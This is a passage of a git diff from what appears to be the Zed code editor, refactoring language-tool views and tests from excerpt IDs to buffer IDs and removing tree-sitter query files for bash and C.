project.languages(); - language_registry.add(Arc::new(Language::new( - LanguageConfig { - name: "Rust".into(), - matcher: LanguageMatcher { - path_suffixes: vec!["rs".to_string()], + for (language_name, path_suffix) in [ + ("C", "c"), + ("Go", "go"), + ("Ruby", "rb"), + ("Rust", "rs"), + ("TypeScript", "ts"), + ] { + language_registry.add(Arc::new(Language::new( + LanguageConfig { + name: language_name.into(), + matcher: LanguageMatcher { + path_suffixes: vec![path_suffix.to_string()], + ..Default::default() + }, ..Default::default() }, - ..Default::default() - }, - None, - ))); - language_registry.add(Arc::new(Language::new( - LanguageConfig { - name: "TypeScript".into(), - matcher: LanguageMatcher { - path_suffixes: vec!["ts".to_string()], - ..Default::default() - }, - ..Default::default() - }, - None, - ))); + None, + ))); + } }); } @@ -406,6 +411,24 @@ mod tests { workspace: &Entity, project: &Entity, cx: &mut VisualTestContext, + ) -> Entity { + let editor = open_new_buffer_editor(workspace, project, cx).await; + // Ensure the buffer has no language after the editor is created + let buffer = editor.read_with(cx, |editor, cx| { + editor + .active_buffer(cx) + .expect("editor should have an active buffer") + }); + buffer.update(cx, |buffer, cx| { + buffer.set_language(None, cx); + }); + editor + } + + async fn open_new_buffer_editor( + workspace: &Entity, + project: &Entity, + cx: &mut VisualTestContext, ) -> Entity { let create_buffer = project.update(cx, |project, cx| project.create_buffer(None, true, cx)); let buffer = create_buffer.await.expect("empty buffer should be created"); @@ -415,10 +438,6 @@ mod tests { workspace.update_in(cx, |workspace, window, cx| { workspace.add_item_to_center(Box::new(editor.clone()), window, cx); }); - // Ensure the buffer has no language after the editor is created - buffer.update(cx, |buffer, cx| { - buffer.set_language(None, cx); - }); editor } @@ -435,8 +454,8 @@ mod tests { .await .expect("language should exist in registry"); editor.update(cx, move |editor, cx| { - let (_, buffer, _) = editor - .active_excerpt(cx) + let buffer = editor + .active_buffer(cx) .expect("editor should have an active excerpt"); buffer.update(cx, |buffer, cx| { buffer.set_language(Some(language), cx); @@ -560,9 +579,9 @@ mod tests { assert_selected_language_for_editor(&workspace, &rust_editor, Some("Rust"), cx); assert_selected_language_for_editor(&workspace, &typescript_editor, Some("TypeScript"), cx); // Ensure the empty editor's buffer has no language before asserting - let (_, buffer, _) = empty_editor.read_with(cx, |editor, cx| { + let buffer = empty_editor.read_with(cx, |editor, cx| { editor - .active_excerpt(cx) + .active_buffer(cx) .expect("editor should have an active excerpt") }); buffer.update(cx, |buffer, cx| { @@ -570,4 +589,84 @@ mod tests { }); assert_selected_language_for_editor(&workspace, &empty_editor, None, cx); } + + #[gpui::test] + async fn test_language_selector_selects_first_match_after_querying_new_buffer( + cx: &mut TestAppContext, + ) { + let app_state = init_test(cx); + app_state + .fs + .as_fake() + .insert_tree(path!("/test"), json!({})) + .await; + + let project = Project::test(app_state.fs.clone(), [path!("/test").as_ref()], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = + multi_workspace.read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone()); + register_test_languages(&project, cx); + + let editor = open_new_buffer_editor(&workspace, &project, cx).await; + workspace.update_in(cx, |workspace, window, cx| { + let was_activated = workspace.activate_item(&editor, true, true, window, cx); + assert!( + was_activated, + "editor should be activated before opening the modal" + ); + }); + cx.run_until_parked(); + + let picker = open_selector(&workspace, cx); + picker.read_with(cx, |picker, _| { + let selected_match = picker + .delegate + .matches + .get(picker.delegate.selected_index) + .expect("selected index should point to a match"); + let selected_candidate = picker + .delegate + .candidates + .get(selected_match.candidate_id) + .expect("selected match should map to a candidate"); + + assert_eq!(selected_candidate.string, "Plain Text"); + assert!( + picker + .delegate + .current_language_candidate_index + .is_some_and(|current_language_candidate_index| { + current_language_candidate_index > 1 + }), + "test setup should place Plain Text after at least two earlier languages", + ); + }); + + picker.update_in(cx, |picker, window, cx| { + picker.update_matches("ru".to_string(), window, cx) + }); + cx.run_until_parked(); + + picker.read_with(cx, |picker, _| { + assert!( + picker.delegate.matches.len() > 1, + "query should return multiple matches" + ); + assert_eq!(picker.delegate.selected_index, 0); + + let first_match = picker + .delegate + .matches + .first() + .expect("query should produce at least one match"); + let selected_match = picker + .delegate + .matches + .get(picker.delegate.selected_index) + .expect("selected index should point to a match"); + + assert_eq!(selected_match.candidate_id, first_match.candidate_id); + }); + } } diff --git a/crates/language_tools/Cargo.toml b/crates/language_tools/Cargo.toml index 1698c7294969d3d3a641f0eb4611153efb658c6d..26e230c1d92f674642eab125f62787a3c29a3665 100644 --- a/crates/language_tools/Cargo.toml +++ b/crates/language_tools/Cargo.toml @@ -44,4 +44,5 @@ release_channel.workspace = true gpui = { workspace = true, features = ["test-support"] } semver.workspace = true util = { workspace = true, features = ["test-support"] } -zlog.workspace = true \ No newline at end of file +zlog.workspace = true +theme_settings.workspace = true \ No newline at end of file diff --git a/crates/language_tools/src/highlights_tree_view.rs b/crates/language_tools/src/highlights_tree_view.rs index 9796c1c07375956184bdd28fbd8f5bb52bff2a32..763cdf76dab46a7fc1c233eda84cfb4ab50e6975 100644 --- a/crates/language_tools/src/highlights_tree_view.rs +++ b/crates/language_tools/src/highlights_tree_view.rs @@ -1,5 +1,5 @@ use editor::{ - Anchor, Editor, ExcerptId, HighlightKey, MultiBufferSnapshot, SelectionEffects, ToPoint, + Anchor, Editor, HighlightKey, MultiBufferSnapshot, SelectionEffects, ToPoint, scroll::Autoscroll, }; use gpui::{ @@ -8,7 +8,7 @@ use gpui::{ MouseDownEvent, MouseMoveEvent, ParentElement, Render, ScrollStrategy, SharedString, Styled, Task, UniformListScrollHandle, WeakEntity, Window, actions, div, rems, uniform_list, }; -use language::ToOffset; +use language::{BufferId, Point, ToOffset}; use menu::{SelectNext, SelectPrevious}; use std::{mem, ops::Range}; use theme::ActiveTheme; @@ -113,12 +113,12 @@ impl HighlightCategory { #[derive(Debug, Clone)] struct HighlightEntry { - excerpt_id: ExcerptId, range: Range, + buffer_id: BufferId, + buffer_point_range: Range, range_display: SharedString, style: HighlightStyle, category: HighlightCategory, - sort_key: (ExcerptId, u32, u32, u32, u32), } /// An item in the display list: either a separator between excerpts or a highlight entry. @@ -209,20 +209,32 @@ impl HighlightsTreeView { window: &mut Window, cx: &mut Context, ) { - let Some(editor) = active_item - .filter(|item| item.item_id() != cx.entity_id()) - .and_then(|item| item.downcast::()) - else { - self.clear(cx); - return; + let active_editor = match active_item { + Some(active_item) => { + if active_item.item_id() == cx.entity_id() { + return; + } else { + match active_item.downcast::() { + Some(active_editor) => active_editor, + None => { + self.clear(cx); + return; + } + } + } + } + None => { + self.clear(cx); + return; + } }; let is_different_editor = self .editor .as_ref() - .is_none_or(|state| state.editor != editor); + .is_none_or(|state| state.editor != active_editor); if is_different_editor { - self.set_editor(editor, window, cx); + self.set_editor(active_editor, window, cx); } } @@ -306,20 +318,18 @@ impl HighlightsTreeView { display_map.update(cx, |display_map, cx| { for (key, text_highlights) in display_map.all_text_highlights() { for range in &text_highlights.1 { - let excerpt_id = range.start.excerpt_id; - let (range_display, sort_key) = format_anchor_range( - range, - excerpt_id, - &multi_buffer_snapshot, - is_singleton, - ); + let Some((range_display, buffer_id, buffer_point_range)) = + format_anchor_range(range, &multi_buffer_snapshot) + else { + continue; + }; entries.push(HighlightEntry { - excerpt_id, range: range.clone(), + buffer_id, range_display, style: text_highlights.0, category: HighlightCategory::Text(*key), - sort_key, + buffer_point_range, }); } } @@ -332,13 +342,11 @@ impl HighlightsTreeView { .and_then(|buf| buf.read(cx).language().map(|l| l.name())); for token in tokens.iter() { let range = token.range.start..token.range.end; - let excerpt_id = range.start.excerpt_id; - let (range_display, sort_key) = format_anchor_range( - &range, - excerpt_id, - &multi_buffer_snapshot, - is_singleton, - ); + let Some((range_display, entry_buffer_id, buffer_point_range)) = + format_anchor_range(&range, &multi_buffer_snapshot) + else { + continue; + }; let Some(stylizer) = lsp_store.get_or_create_token_stylizer( token.server_id, language_name.as_ref(), @@ -363,7 +371,9 @@ impl HighlightsTreeView { rule.style .iter() .find(|style_name| { - semantic_theme.get_opt(style_name).is_some() + semantic_theme + .style_for_name(style_name) + .is_some() }) .map(|style_name| { SharedString::from(style_name.clone()) @@ -373,8 +383,8 @@ impl HighlightsTreeView { }); entries.push(HighlightEntry { - excerpt_id, range, + buffer_id: entry_buffer_id, range_display, style: interner[token.style], category: HighlightCategory::SemanticToken { @@ -384,7 +394,7 @@ impl HighlightsTreeView { .map(SharedString::from), theme_key, }, - sort_key, + buffer_point_range, }); } } @@ -392,27 +402,34 @@ impl HighlightsTreeView { }); let syntax_theme = cx.theme().syntax().clone(); - for (excerpt_id, buffer_snapshot, excerpt_range) in multi_buffer_snapshot.excerpts() { + for excerpt_range in multi_buffer_snapshot.excerpts() { + let Some(buffer_snapshot) = + multi_buffer_snapshot.buffer_for_id(excerpt_range.context.start.buffer_id) + else { + continue; + }; + let start_offset = excerpt_range.context.start.to_offset(buffer_snapshot); let end_offset = excerpt_range.context.end.to_offset(buffer_snapshot); let range = start_offset..end_offset; - let captures = buffer_snapshot - .syntax - .captures(range, buffer_snapshot, |grammar| { - grammar.highlights_config.as_ref().map(|c| &c.query) - }); + let captures = buffer_snapshot.captures(range, |grammar| { + grammar.highlights_config.as_ref().map(|c| &c.query) + }); let grammars: Vec<_> = captures.grammars().to_vec(); let highlight_maps: Vec<_> = grammars.iter().map(|g| g.highlight_map()).collect(); for capture in captures { - let highlight_id = highlight_maps[capture.grammar_index].get(capture.index); - let Some(style) = highlight_id.style(&syntax_theme) else { + let Some(highlight_id) = highlight_maps[capture.grammar_index].get(capture.index) + else { + continue; + }; + let Some(style) = syntax_theme.get(highlight_id).cloned() else { continue; }; - let theme_key = highlight_id - .name(&syntax_theme) + let theme_key = syntax_theme + .get_capture_name(highlight_id) .map(|theme_key| SharedString::from(theme_key.to_string())); let capture_name = grammars[capture.grammar_index] @@ -425,8 +442,8 @@ impl HighlightsTreeView { let start_anchor = buffer_snapshot.anchor_before(capture.node.start_byte()); let end_anchor = buffer_snapshot.anchor_after(capture.node.end_byte()); - let start = multi_buffer_snapshot.anchor_in_excerpt(excerpt_id, start_anchor); - let end = multi_buffer_snapshot.anchor_in_excerpt(excerpt_id, end_anchor); + let start = multi_buffer_snapshot.anchor_in_excerpt(start_anchor); + let end = multi_buffer_snapshot.anchor_in_excerpt(end_anchor); let (start, end) = match (start, end) { (Some(s), Some(e)) => (s, e), @@ -434,29 +451,38 @@ impl HighlightsTreeView { }; let range = start..end; - let (range_display, sort_key) = - format_anchor_range(&range, excerpt_id, &multi_buffer_snapshot, is_singleton); + let Some((range_display, buffer_id, buffer_point_range)) = + format_anchor_range(&range, &multi_buffer_snapshot) + else { + continue; + }; entries.push(HighlightEntry { - excerpt_id, range, + buffer_id, range_display, style, category: HighlightCategory::SyntaxToken { capture_name, theme_key, }, - sort_key, + buffer_point_range, }); } } entries.sort_by(|a, b| { - a.sort_key - .cmp(&b.sort_key) + a.buffer_id + .cmp(&b.buffer_id) + .then_with(|| a.buffer_point_range.start.cmp(&b.buffer_point_range.start)) + .then_with(|| a.buffer_point_range.end.cmp(&b.buffer_point_range.end)) .then_with(|| a.category.cmp(&b.category)) }); - entries.dedup_by(|a, b| a.sort_key == b.sort_key && a.category == b.category); + entries.dedup_by(|a, b| { + a.buffer_id == b.buffer_id + && a.buffer_point_range == b.buffer_point_range + && a.category == b.category + }); self.cached_entries = entries; self.rebuild_display_items(&multi_buffer_snapshot, cx); @@ -472,7 +498,7 @@ impl HighlightsTreeView { fn rebuild_display_items(&mut self, snapshot: &MultiBufferSnapshot, cx: &App) { self.display_items.clear(); - let mut last_excerpt_id: Option = None; + let mut last_range_end: Option = None; for (entry_ix, entry) in self.cached_entries.iter().enumerate() { if !self.should_show_entry(entry) { @@ -480,11 +506,14 @@ impl HighlightsTreeView { } if !self.is_singleton { - let excerpt_changed = - last_excerpt_id.is_none_or(|last_id| last_id != entry.excerpt_id); + let excerpt_changed = last_range_end.is_none_or(|anchor| { + snapshot + .excerpt_containing(anchor..entry.range.start) + .is_none() + }); if excerpt_changed { - last_excerpt_id = Some(entry.excerpt_id); - let label = excerpt_label_for(entry.excerpt_id, snapshot, cx); + last_range_end = Some(entry.range.end); + let label = excerpt_label_for(entry, snapshot, cx); self.display_items .push(DisplayItem::ExcerptSeparator { label }); } @@ -503,10 +532,6 @@ impl HighlightsTreeView { } fn scroll_to_cursor_position(&mut self, cursor: &Anchor, snapshot: &MultiBufferSnapshot) { - let cursor_point = cursor.to_point(snapshot); - let cursor_key = (cursor_point.row, cursor_point.column); - let cursor_excerpt = cursor.excerpt_id; - let best = self .display_items .iter() @@ -519,17 +544,18 @@ impl HighlightsTreeView { _ => None, }) .filter(|(_, _, entry)| { - let (excerpt_id, start_row, start_col, end_row, end_col) = entry.sort_key; - if !self.is_singleton && excerpt_id != cursor_excerpt { - return false; - } - let start = (start_row, start_col); - let end = (end_row, end_col); - cursor_key >= start && cursor_key <= end + entry.range.start.cmp(&cursor, snapshot).is_le() + && cursor.cmp(&entry.range.end, snapshot).is_lt() }) .min_by_key(|(_, _, entry)| { - let (_, start_row, start_col, end_row, end_col) = entry.sort_key; - (end_row - start_row, end_col.saturating_sub(start_col)) + ( + entry.buffer_point_range.end.row - entry.buffer_point_range.start.row, + entry + .buffer_point_range + .end + .column + .saturating_sub(entry.buffer_point_range.start.column), + ) }) .map(|(display_ix, entry_ix, _)| (display_ix, entry_ix)); @@ -1063,12 +1089,13 @@ impl ToolbarItemView for HighlightsTreeToolbarItemView { } fn excerpt_label_for( - excerpt_id: ExcerptId, + entry: &HighlightEntry, snapshot: &MultiBufferSnapshot, cx: &App, ) -> SharedString { - let buffer = snapshot.buffer_for_excerpt(excerpt_id); - let path_label = buffer + let path_label = snapshot + .anchor_to_buffer_anchor(entry.range.start) + .and_then(|(anchor, _)| snapshot.buffer_for_id(anchor.buffer_id)) .and_then(|buf| buf.file()) .map(|file| { let full_path = file.full_path(cx); @@ -1080,50 +1107,21 @@ fn excerpt_label_for( fn format_anchor_range( range: &Range, - excerpt_id: ExcerptId, snapshot: &MultiBufferSnapshot, - is_singleton: bool, -) -> (SharedString, (ExcerptId, u32, u32, u32, u32)) { - if is_singleton { - let start = range.start.to_point(snapshot); - let end = range.end.to_point(snapshot); - let display = SharedString::from(format!( - "[{}:{} - {}:{}]", - start.row + 1, - start.column + 1, - end.row + 1, - end.column + 1, - )); - let sort_key = (excerpt_id, start.row, start.column, end.row, end.column); - (display, sort_key) - } else { - let buffer = snapshot.buffer_for_excerpt(excerpt_id); - if let Some(buffer) = buffer { - let start = language::ToPoint::to_point(&range.start.text_anchor, buffer); - let end = language::ToPoint::to_point(&range.end.text_anchor, buffer); - let display = SharedString::from(format!( - "[{}:{} - {}:{}]", - start.row + 1, - start.column + 1, - end.row + 1, - end.column + 1, - )); - let sort_key = (excerpt_id, start.row, start.column, end.row, end.column); - (display, sort_key) - } else { - let start = range.start.to_point(snapshot); - let end = range.end.to_point(snapshot); - let display = SharedString::from(format!( - "[{}:{} - {}:{}]", - start.row + 1, - start.column + 1, - end.row + 1, - end.column + 1, - )); - let sort_key = (excerpt_id, start.row, start.column, end.row, end.column); - (display, sort_key) - } - } +) -> Option<(SharedString, BufferId, Range)> { + let start = range.start.to_point(snapshot); + let end = range.end.to_point(snapshot); + let ((start_buffer, start), (_, end)) = snapshot + .point_to_buffer_point(start) + .zip(snapshot.point_to_buffer_point(end))?; + let display = SharedString::from(format!( + "[{}:{} - {}:{}]", + start.row + 1, + start.column + 1, + end.row + 1, + end.column + 1, + )); + Some((display, start_buffer.remote_id(), start..end)) } fn render_style_preview(style: HighlightStyle, selected: bool, cx: &App) -> Div { diff --git a/crates/language_tools/src/lsp_button.rs b/crates/language_tools/src/lsp_button.rs index 781c18eb84cbc9ad7a1b666c089a7b65460c327b..43b1736223478fe29f45aac0a712fafad1d2dcbe 100644 --- a/crates/language_tools/src/lsp_button.rs +++ b/crates/language_tools/src/lsp_button.rs @@ -230,7 +230,7 @@ impl LanguageServerState { ( server_id, ( - status.server_version.clone(), + status.server_readable_version.clone(), status.binary.as_ref().map(|b| b.path.clone()), status.process_id, ), @@ -1179,13 +1179,20 @@ impl StatusItemView for LspButton { .and_then(|active_editor| active_editor.editor.upgrade()) .as_ref() { - let editor_buffers = - HashSet::from_iter(editor.read(cx).buffer().read(cx).excerpt_buffer_ids()); + let editor_buffers = HashSet::from_iter( + editor + .read(cx) + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id), + ); let _editor_subscription = cx.subscribe_in( &editor, window, |lsp_button, _, e: &EditorEvent, window, cx| match e { - EditorEvent::ExcerptsAdded { buffer, .. } => { + EditorEvent::BufferRangesUpdated { buffer, .. } => { let updated = lsp_button.server_state.update(cx, |state, cx| { if let Some(active_editor) = state.active_editor.as_mut() { let buffer_id = buffer.read(cx).remote_id(); @@ -1198,9 +1205,7 @@ impl StatusItemView for LspButton { lsp_button.refresh_lsp_menu(false, window, cx); } } - EditorEvent::ExcerptsRemoved { - removed_buffer_ids, .. - } => { + EditorEvent::BuffersRemoved { removed_buffer_ids } => { let removed = lsp_button.server_state.update(cx, |state, _| { let mut removed = false; if let Some(active_editor) = state.active_editor.as_mut() { diff --git a/crates/language_tools/src/lsp_log_view.rs b/crates/language_tools/src/lsp_log_view.rs index a4b8977da7661b09b85fff3cbb86c2a3ff1647aa..97f0676d250cac2cee54b307e7c07d894d3d3128 100644 --- a/crates/language_tools/src/lsp_log_view.rs +++ b/crates/language_tools/src/lsp_log_view.rs @@ -18,7 +18,7 @@ use project::{ }; use proto::toggle_lsp_logs::LogType; use std::{any::TypeId, borrow::Cow, sync::Arc}; -use ui::{Button, Checkbox, ContextMenu, Label, PopoverMenu, ToggleState, prelude::*}; +use ui::{Checkbox, ContextMenu, PopoverMenu, ToggleState, prelude::*}; use util::ResultExt as _; use workspace::{ SplitDirection, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, WorkspaceId, @@ -880,6 +880,7 @@ impl SearchableItem for LspLogView { // LSP log is read-only. replacement: false, selection: false, + select_all: true, } } fn active_match_index( @@ -969,9 +970,11 @@ impl Render for LspLogToolbarItemView { }) .unwrap_or_else(|| "No server selected".into()), ) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + .end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu({ let log_view = log_view.clone(); @@ -1030,10 +1033,11 @@ impl Render for LspLogToolbarItemView { PopoverMenu::new("LspViewSelector") .anchor(Corner::TopLeft) .trigger( - Button::new("language_server_menu_header", label) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + Button::new("language_server_menu_header", label).end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu(move |window, cx| { let log_toolbar_view = log_toolbar_view.upgrade()?; @@ -1125,9 +1129,11 @@ impl Render for LspLogToolbarItemView { "language_server_trace_level_selector", "Trace level", ) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + .end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu({ let log_view = log_view; @@ -1193,9 +1199,11 @@ impl Render for LspLogToolbarItemView { "language_server_log_level_selector", "Log level", ) - .icon(IconName::ChevronDown) - .icon_size(IconSize::Small) - .icon_color(Color::Muted), + .end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::Small) + .color(Color::Muted), + ), ) .menu({ let log_view = log_view; @@ -1348,6 +1356,7 @@ impl ServerInfo { status: LanguageServerStatus { name: server.name(), server_version: server.version(), + server_readable_version: server.readable_version(), pending_work: Default::default(), has_pending_diagnostic_updates: false, progress_tokens: Default::default(), diff --git a/crates/language_tools/src/lsp_log_view_tests.rs b/crates/language_tools/src/lsp_log_view_tests.rs index 0b4516f5d052260ac4274e9afe14d3bc1a5ef8ee..476f23ffd82c66a581587d8f8fb70c4192ab04e0 100644 --- a/crates/language_tools/src/lsp_log_view_tests.rs +++ b/crates/language_tools/src/lsp_log_view_tests.rs @@ -109,7 +109,7 @@ fn init_test(cx: &mut gpui::TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); release_channel::init(semver::Version::new(0, 0, 0), cx); }); } diff --git a/crates/language_tools/src/syntax_tree_view.rs b/crates/language_tools/src/syntax_tree_view.rs index b44d2e05d90733469a5385c2695b3fda3ff47c5e..9c751dd8eaf71272b649b037425caa4aa73b39cc 100644 --- a/crates/language_tools/src/syntax_tree_view.rs +++ b/crates/language_tools/src/syntax_tree_view.rs @@ -1,7 +1,6 @@ use command_palette_hooks::CommandPaletteFilter; use editor::{ - Anchor, Editor, ExcerptId, HighlightKey, MultiBufferOffset, SelectionEffects, - scroll::Autoscroll, + Anchor, Editor, HighlightKey, MultiBufferOffset, SelectionEffects, scroll::Autoscroll, }; use gpui::{ App, AppContext as _, Context, Div, Entity, EntityId, EventEmitter, FocusHandle, Focusable, @@ -125,7 +124,6 @@ impl EditorState { #[derive(Clone)] struct BufferState { buffer: Entity, - excerpt_id: ExcerptId, active_layer: Option, } @@ -253,18 +251,18 @@ impl SyntaxTreeView { let snapshot = editor_state .editor .update(cx, |editor, cx| editor.snapshot(window, cx)); - let (buffer, range, excerpt_id) = editor_state.editor.update(cx, |editor, cx| { + let (buffer, range) = editor_state.editor.update(cx, |editor, cx| { let selection_range = editor .selections .last::(&editor.display_snapshot(cx)) .range(); let multi_buffer = editor.buffer().read(cx); - let (buffer, range, excerpt_id) = snapshot + let (buffer, range, _) = snapshot .buffer_snapshot() - .range_to_buffer_ranges(selection_range.start..=selection_range.end) + .range_to_buffer_ranges(selection_range.start..selection_range.end) .pop()?; let buffer = multi_buffer.buffer(buffer.remote_id()).unwrap(); - Some((buffer, range, excerpt_id)) + Some((buffer, range)) })?; // If the cursor has moved into a different excerpt, retrieve a new syntax layer @@ -273,16 +271,14 @@ impl SyntaxTreeView { .active_buffer .get_or_insert_with(|| BufferState { buffer: buffer.clone(), - excerpt_id, active_layer: None, }); let mut prev_layer = None; if did_reparse { prev_layer = buffer_state.active_layer.take(); } - if buffer_state.buffer != buffer || buffer_state.excerpt_id != excerpt_id { + if buffer_state.buffer != buffer { buffer_state.buffer = buffer.clone(); - buffer_state.excerpt_id = excerpt_id; buffer_state.active_layer = None; } @@ -360,8 +356,7 @@ impl SyntaxTreeView { // Build a multibuffer anchor range. let multibuffer = editor_state.editor.read(cx).buffer(); let multibuffer = multibuffer.read(cx).snapshot(cx); - let excerpt_id = buffer_state.excerpt_id; - let range = multibuffer.anchor_range_in_excerpt(excerpt_id, range)?; + let range = multibuffer.buffer_anchor_range_to_anchor_range(range)?; let key = cx.entity_id().as_u64() as usize; // Update the editor with the anchor range. diff --git a/crates/languages/Cargo.toml b/crates/languages/Cargo.toml index 8529bdb82ace33d6f3c747ed707b9aac9d319627..93c70d4b27a0b769df521618c22c0700430be2f8 100644 --- a/crates/languages/Cargo.toml +++ b/crates/languages/Cargo.toml @@ -13,24 +13,9 @@ test-support = [ "load-grammars" ] load-grammars = [ + "grammars/load-grammars", "tree-sitter", - "tree-sitter-bash", - "tree-sitter-c", - "tree-sitter-cpp", - "tree-sitter-css", - "tree-sitter-diff", "tree-sitter-gitcommit", - "tree-sitter-go", - "tree-sitter-go-mod", - "tree-sitter-gowork", - "tree-sitter-jsdoc", - "tree-sitter-json", - "tree-sitter-md", - "tree-sitter-python", - "tree-sitter-regex", - "tree-sitter-rust", - "tree-sitter-typescript", - "tree-sitter-yaml", ] [dependencies] @@ -44,6 +29,7 @@ collections.workspace = true futures.workspace = true globset.workspace = true gpui.workspace = true +grammars.workspace = true http_client.workspace = true itertools.workspace = true json_schema_store.workspace = true @@ -62,7 +48,6 @@ pet.workspace = true project.workspace = true regex.workspace = true rope.workspace = true -rust-embed.workspace = true serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true @@ -74,31 +59,14 @@ snippet.workspace = true task.workspace = true terminal.workspace = true theme.workspace = true -toml.workspace = true tree-sitter = { workspace = true, optional = true } -tree-sitter-bash = { workspace = true, optional = true } -tree-sitter-c = { workspace = true, optional = true } -tree-sitter-cpp = { workspace = true, optional = true } -tree-sitter-css = { workspace = true, optional = true } -tree-sitter-diff = { workspace = true, optional = true } tree-sitter-gitcommit = { workspace = true, optional = true } -tree-sitter-go = { workspace = true, optional = true } -tree-sitter-go-mod = { workspace = true, optional = true } -tree-sitter-gowork = { workspace = true, optional = true } -tree-sitter-jsdoc = { workspace = true, optional = true } -tree-sitter-json = { workspace = true, optional = true } -tree-sitter-md = { workspace = true, optional = true } -tree-sitter-python = { workspace = true, optional = true } -tree-sitter-regex = { workspace = true, optional = true } -tree-sitter-rust = { workspace = true, optional = true } -tree-sitter-typescript = { workspace = true, optional = true } -tree-sitter-yaml = { workspace = true, optional = true } url.workspace = true util.workspace = true [dev-dependencies] +fs = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true -text.workspace = true theme = { workspace = true, features = ["test-support"] } tree-sitter-bash.workspace = true tree-sitter-c.workspace = true @@ -106,7 +74,7 @@ tree-sitter-cpp.workspace = true tree-sitter-css.workspace = true tree-sitter-go.workspace = true tree-sitter-python.workspace = true +tree-sitter-rust.workspace = true tree-sitter-typescript.workspace = true tree-sitter.workspace = true unindent.workspace = true -workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/languages/src/bash/brackets.scm b/crates/languages/src/bash/brackets.scm deleted file mode 100644 index 88a2a1b67f602afb4e7de21a0ec0a523d33e37ee..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/brackets.scm +++ /dev/null @@ -1,12 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("`" @open "`" @close) (#set! rainbow.exclude)) -(("do" @open "done" @close) (#set! newline.only) (#set! rainbow.exclude)) -((case_statement ("in" @open "esac" @close)) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement (elif_clause ("then" @open)) (else_clause ("else" @close))) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement (else_clause ("else" @open)) "fi" @close) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement ("then" @open) (elif_clause ("elif" @close))) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement ("then" @open) (else_clause ("else" @close))) (#set! newline.only) (#set! rainbow.exclude)) -((if_statement ("then" @open "fi" @close)) (#set! newline.only) (#set! rainbow.exclude)) diff --git a/crates/languages/src/bash/injections.scm b/crates/languages/src/bash/injections.scm deleted file mode 100644 index 9117c713b98fdd2896b13e4949a77c6489b9ee36..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/injections.scm +++ /dev/null @@ -1,3 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) diff --git a/crates/languages/src/bash/redactions.scm b/crates/languages/src/bash/redactions.scm deleted file mode 100644 index 000cb042a573112a7d3c46f56862ba4119fdfdf3..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/redactions.scm +++ /dev/null @@ -1,2 +0,0 @@ -(variable_assignment - value: (_) @redact) diff --git a/crates/languages/src/bash/runnables.scm b/crates/languages/src/bash/runnables.scm deleted file mode 100644 index c88e549347b4d4897c43d22d24550f3904d8c5d1..0000000000000000000000000000000000000000 --- a/crates/languages/src/bash/runnables.scm +++ /dev/null @@ -1,5 +0,0 @@ -; Run bash scripts -( - (program . (_) @run) @_bash-script - (#set! tag bash-script) -) diff --git a/crates/languages/src/c.rs b/crates/languages/src/c.rs index 3a9207329d58a60acb0da42699116336d4528c97..bc75a9dbabbf0687124da5e35e6435ebc377e854 100644 --- a/crates/languages/src/c.rs +++ b/crates/languages/src/c.rs @@ -368,7 +368,7 @@ impl super::LspAdapter for CLspAdapter { Ok(original) } - fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic, _: &App) -> bool { + fn retain_old_diagnostic(&self, previous_diagnostic: &Diagnostic) -> bool { clangd_ext::is_inactive_region(previous_diagnostic) } diff --git a/crates/languages/src/c/brackets.scm b/crates/languages/src/c/brackets.scm deleted file mode 100644 index 2149bddc6c9a7ec04667d03da75580b676e12a28..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/brackets.scm +++ /dev/null @@ -1,5 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/c/imports.scm b/crates/languages/src/c/imports.scm deleted file mode 100644 index c3c2c9e68c4503d323d039f9c042d9501b5e4126..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/imports.scm +++ /dev/null @@ -1,7 +0,0 @@ -(preproc_include - path: [ - ( - (system_lib_string) @source @wildcard - (#strip! @source "[<>]")) - (string_literal (string_content) @source @wildcard) - ]) @import diff --git a/crates/languages/src/c/outline.scm b/crates/languages/src/c/outline.scm deleted file mode 100644 index efd911836cb718d698460adfe2d91d19cb976b30..0000000000000000000000000000000000000000 --- a/crates/languages/src/c/outline.scm +++ /dev/null @@ -1,91 +0,0 @@ -(preproc_def - "#define" @context - name: (_) @name) @item - -(preproc_function_def - "#define" @context - name: (_) @name - parameters: (preproc_params - "(" @context - ")" @context)) @item - -(struct_specifier - "struct" @context - name: (_) @name) @item - -(union_specifier - "union" @context - name: (_) @name) @item - -(enum_specifier - "enum" @context - name: (_) @name) @item - -(enumerator - name: 